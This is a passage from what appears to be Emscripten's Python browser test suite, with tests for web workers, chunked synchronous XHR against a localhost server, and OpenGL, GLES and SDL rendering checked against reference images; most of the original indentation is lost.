def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
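# build the worker both with and without a preloaded data file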
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").forEach(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
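// chars arrive one code at a time; buffer until a newline (10), then flush the whole line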
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # mask to an unsigned 32-bit value
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
  try:
    urlopen('http://localhost:11111')
    break
  except Exception:
    print('(sleep for server)')
    time.sleep(1)
else:
  # reached only if every attempt failed
  raise Exception('chunked XHR test server did not start')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
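# A minimal sketch of the server-readiness polling above, factored into a
# reusable helper. `wait_for_server` is a hypothetical name, not part of the
# test harness; it only illustrates the retry-until-timeout pattern.
def wait_for_server(url, attempts=60, delay=1):
  for _ in range(attempts):
    try:
      urlopen(url)  # any successful request means the server socket is up
      return
    except Exception:
      time.sleep(delay)
  raise Exception('server at %s did not come up after %d attempts' % (url, attempts))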
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_third]', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove this test later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
